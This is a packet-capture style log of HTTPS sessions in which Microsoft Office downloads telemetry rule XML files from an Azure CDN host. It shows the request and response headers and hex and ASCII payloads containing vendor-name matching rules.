2024-11-04 16:31:21 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.5	49724	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:20 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 23b843a5-001e-0065-686a-2e0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163121Z-15869dbbcc6xpvqthC1DFW7ehg00000000p0000000000n75 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	49728	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:21 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163121Z-16547b76f7f7rtshhC1DFWrtqn000000040g000000002e9u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49731	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:21 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 9ed703a9-f01e-0020-1358-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163121Z-176bd8f9bc5pqws8hC1DFW15kc00000005hg00000000345z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49729	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:21 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 00beaf03-101e-0065-2c60-2e4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163121Z-15869dbbcc6lxrkghC1DFWp3wc00000003t000000000dfna x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49730	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:21 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163121Z-16547b76f7fr4g8xhC1DFW9cqc000000030g00000000nssn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49727	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:21 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: ee786005-101e-0065-140e-2d4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163121Z-16547b76f7f76p6chC1DFWctqw00000003yg00000000kfe7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	49735	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:22 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:22 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:22 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163122Z-16547b76f7fm7xw6hC1DFW5px400000003rg00000000qafr x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:22 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	49734	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:22 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:22 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:22 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163122Z-16547b76f7fq9mcrhC1DFWq15w00000003w000000000csh7 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:22 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	49736	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:22 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:22 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: e16c3d14-801e-00a3-050a-2d7cfb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163122Z-16547b76f7fx6rhxhC1DFW76kg00000003s000000000u3vv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:22 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49738	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:23 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:23 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 183719b9-d01e-00a1-43c3-2c35b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163123Z-16547b76f7f67wxlhC1DFWah9w00000003ug00000000kbda x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:23 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49739	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:23 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:23 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:23 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: c6ea79c0-701e-0050-6324-2c6767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163123Z-r159446fcd76z8lfhC1DFWug2s00000004p000000000c50e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:23 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	49737	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:23 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
